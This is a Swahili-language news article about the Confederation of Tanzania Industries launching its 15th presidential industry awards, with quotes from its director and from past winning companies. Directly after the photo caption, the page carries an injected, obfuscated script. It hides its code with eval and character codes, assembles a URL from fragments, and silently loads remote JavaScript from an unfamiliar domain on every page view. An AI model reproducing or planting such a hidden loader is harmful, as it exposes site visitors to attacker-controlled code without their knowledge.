Recent Comments

CTI yazindua shindano la 15 tuzo za viwanda

By Juma Issihaka Sep 24, 2020
<p>Mkurugenzi wa CTI, Leodegar Tenga, (Katikati).</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

SHIRIKISHO la Viwanda Tanzania (CTI), limetangaza rasmi kuanza kwa shindano la 15 la tuzo za Rais za mzalishaji bora wa mwaka viwandani (PMAYA), ili kutoa nafasi kwa viwanda kujitathmini katika uzalishaji.

Mkurugenzi wa CTI, Leodegar Tenga, amesema shindano hilo linafuatia uungwaji mkono wa mlezi wa shirikisho hilo, Rais Dk. John Magufuli, katika jitihada zake za kuifanya Tanzania kuwa na uchumi wa viwanda ifikapo 2025.

Amesema shindano hilo linalenga kutambua mchango wa sekta ya viwanda, kutangaza umuhimu wa sekta hiyo, kuongeza tija kwenye viwango vya ufanyaji biashara na kukuza utawala bora wa makampuni nchini.

Ameongeza kuwa hadi sasa tayari wameshapata ushirikiano wa kutosha kutoka kwa wadau mbalimbali na kwamba tayari kwa mwaka huu wameshaanza kupokea washiriki wengi kutoka maeneo yote nchini.

“Huu ni muda muafaka kwa viwanda vya kati na vidogo kutumia jukwaa hili kama nafasi kwao kuongoza kwenye nyanja tofauti, kutambulika, kuchangia ukuaji wa biashara zao na kutambulika,” amesema.

Kwa upande wake Meneja wa Masoko wa Kampuni ya ALAF Ltd, iliyokuwa mshindi wa kiwango kikubwa kwenye kipengele cha chuma kwenye shindano la mwaka jana, Theresia Mmasy, alisema tuzo hizo ndio msingi wa kutambulika kwa viwanda mbalimbali.

Amesema mashindano hayo yamekuwa miongoni mwa njia fasaha ya kampuni kuongeza ubora wa bidhaa na huduma zao kwa jamii.

Kwa mujibu wa CTI tathmini ya shindano hilo inafanyika na jopo la wakaguzi na mwishoni inatoa taarifa na majibu ya tathmini iliyofanywa na washiriki watapewa majibu ili kutambua mapungufu na umahiri wao.

Naye mwakilishi wa Kampuni ya PLASCO Ltd, iliyokuwa mshindi wa wa kiwango kikubwa kwenye kipengele cha plastiki na mipira, Edith James, amesema tuzo hizo zimetoa fursa kwa viwanda vya ndani.

Amesema zimesaidia kukuza ufahamu juu ya umuhimu wa kuhakikisha ubora kwenye miradi mikubwa ya miundombinu.

By Juma Issihaka

Juma Issihaka, is the senior journalist with more than five years of experience on the profession. He mostly base on Politics reporting, Environment reporting as well as social affairs.